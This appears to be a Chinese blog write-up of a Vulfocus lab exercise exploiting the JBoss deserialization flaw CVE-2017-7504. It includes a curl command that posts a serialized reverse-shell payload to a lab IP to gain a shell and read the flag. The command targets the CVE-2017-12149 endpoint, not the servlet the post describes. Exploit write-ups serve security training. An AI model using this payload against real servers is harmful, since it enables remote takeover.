[Vulfocus解题系列] jboss 反序列化 (CVE-2017-7504)

漏洞介绍

名称: jboss 反序列化 (CVE-2017-7504)

描述: Red Hat JBoss Application Server(AS,也称WildFly)是美国红帽(Red Hat)公司的一款基于JavaEE的开源的应用服务器,它具有启动超快、轻量、模块化设计、热部署和并行部署、简洁管理、域管理及第一类元件等特性。 Jboss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。

解题过程

CVE-2017-12149和CVE-2017-7504都是反序列化漏洞,因此用的东西都是一样的,复现的过程也是一样的。

这两种漏洞的区别引用一位大佬的文章

CVE-2017-7504
影响范围:JBoss AS 4.x及之前版本。

漏洞原理:JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。

CVE-2017-12149
影响范围:漏洞影响5.x和6.x版本的JBOSSAS。

漏洞原理:该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致攻击者可以通过精心设计的序列化数据来执行任意代码。但有安全研究者发现JBOSSAS 6.x也受该漏洞影响,攻击者利用该漏洞无需用户验证在系统上执行任意命令,获得服务器的控制权。

1.访问靶场环境
在这里插入图片描述
2.利用CVE-2017-12149的工具和脚本在攻击机执行命令,生成poc(详情请移步上一篇文章:[Vulfocus解题系列] jboss 反序列化 (CVE-2017-12149)
在这里插入图片描述
3.另起终端监听端口
在这里插入图片描述
4.第一终端执行以下命令

curl http://118.193.36.37:15853/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

在这里插入图片描述
5.成功反弹shell,执行获取flag的命令,获取flag
在这里插入图片描述

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值